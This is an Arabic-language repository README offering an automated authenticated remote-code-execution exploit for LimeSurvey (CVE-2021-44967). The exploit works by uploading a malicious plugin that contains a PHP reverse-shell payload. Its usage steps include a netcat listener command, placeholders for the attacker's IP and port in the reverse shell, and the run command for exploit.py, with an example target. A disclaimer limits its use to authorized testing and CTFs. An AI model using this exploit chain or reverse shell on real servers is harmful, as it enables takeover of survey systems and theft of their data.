
🔥 استغلال RCE آلي لـ Limesurvey (CVE-2021-44967). سلسلة استغلال محسّنة لتصعيد الامتيازات. 🚀
يحتوي هذا المستودع على استغلال وظيفي لـ CVE-2021-44967، وهي ثغرة تنفيذ الأوامر عن بُعد مع المصادقة في LimeSurvey.
تم اختباره وتأكيد عمله على:
تسمح الثغرة لمستخدم مصادق عليه بصلاحيات إدارية برفع إضافة ضارة. نظرًا لأن LimeSurvey لا تتحقق بدقة من محتويات ملف ZIP الخاص بالإضافة أو تمنع تنفيذ ملفات PHP في دليل الإضافة، يمكن للمهاجم تحقيق تنفيذ الأوامر عن بُعد (RCE) عن طريق الوصول المباشر إلى القشرة المرفوعة.
config.xml للتوافق مع إصدارات LimeSurvey من 3.0 إلى 6.0.ابدأ مستمع netcat على جهازك:
nc -lvnp 443
قم بتعديل php-rev.php واضبط عنوان IP المحلي والمنفذ:
$ip = '<YOUR_IP>';
$port = 443;
python3 exploit.py <TARGET_URL> <USERNAME> <PASSWORD>
مثال:
python3 exploit.py http://10.129.1.243/survey admin test
exploit.py: البرنامج النصي الرئيسي للأتمتة.php-rev.php: حمولة القشرة العكسية PHP.config.xml: ملف تكوين إضافة LimeSurvey الإلزامي.هذه الأداة مخصصة للأغراض التعليمية واختبارات الأمان المصرح بها فقط. مخصصة للاستخدام في بيئات قانونية خاضعة للرقابة فقط (مثل CTFs، أو بيئات المختبرات، أو المهام المصرح بها). المؤلف غير مسؤول عن أي إساءة استخدام أو أضرار تسببها هذه الأداة. استخدمها بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها.